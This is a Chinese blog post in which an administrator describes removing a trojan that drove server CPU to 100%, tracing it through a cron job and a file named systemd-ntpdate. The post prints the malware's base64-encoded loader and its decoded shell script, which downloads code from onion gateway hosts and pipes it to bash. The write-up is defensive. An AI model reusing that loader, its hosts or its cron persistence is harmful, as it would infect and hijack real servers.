CPU占用100%的Systemd木马问题解决

xiaohai 2019-11-02 13:25:55 5894人围观 标签: shell  病毒 
简介最近公司服务器出现几台服务器的CPU一直在100%的状态,肯定是中了木马或者被攻击,本文主要记录下如何处理该木马病毒。
1、使用htop命令查看cpu占用较高的进程

这里不附图,会出现莫名奇妙的个一些进程名称,如XMJwux、90xym5,长度基本都是六位。

2、通过第一步的进程号名称找到对应的进程号kill掉
3、执行完上面一步以为就完了,可以休息下了…,过了十多分钟,CPU又达到百分之百了,不想让我安静会啊!
4、既然kill掉了又启动了,那么肯定有定时任务,进入到定时任务中去
[root@local~]# crontab -e 15 * * * * /root/.systemd-ntpdate cn.pool.ntp.org >/dev/null 2>&1

果不其然,真的有一个定时任务

5、查看/root/.systemd-ntpdate这个文件
#!/bin/bash exec &>/dev/null #ntpdate pool.ntp.org sleep 536 echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10b3JudHBheG53Nnl4aGw0CnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtDE4MCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJHggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSR4Cn0KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wMSkvaW87IHRoZW4KKAp1ICR0Lm9uaW9uLmdsYXNzIHx8CngJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC5vbmlvbi5tbiB8fAp1ICR0Lm9uaW9uLnNoIHx8CnUgJHQub25pb24uaW4ubmV0IHx8CnUgJHQudG9yMndlYi5pbyB8fAp1ICR0LjR0b3IubWwgfHwKdSAkdC5vbmlvbi50bwopfGJhc2gKZmkK|bas64 -d|bash

哎呦,这还base64了,找个工具解析下,真是内容如下:

exec &>/dev/null export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin t=torntpaxnw6yxhl4 u() { x=/crn wget -t1 -T180 -qU- -O- --no-check-certificate $1$x || curl -m180 -fsSLkA- $1$x } if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then ( u $t.onion.glass || u $t.civiclink.network || u $t.onion.mn || u $t.onion.sh || u $t.onion.in.net || u $t.tor2web.io || u $t.4tor.ml || u $t.onion.to )|bash fi

从这段shell代码中能看出,/tmp/.X11-unix/01文件还有点关键

6、查看/tmp/.X11-unix/01,里面有一个号30017(可能读者跟我的不一致),再查找这个进程ID,居然真还有这个进程在运行,不管三七二十一,先kill掉
7、然后再查阅了相关资料,网上很多,这里不列举了,还找到了四个地方出现了systemd-ntpdate跟这个名字一样的文件
/lib/systemd/systemd-ntpdate /root/.systemd-ntpdate /root/.systemd-ntpdate.bak /etc/cron.d/0systemd-ntpdate

查看里面的内容,跟前面的一模一样。不管,删掉。

8、基本处理完成,还在观察中
9、具体为什么会中病毒,这个也还在查询资料中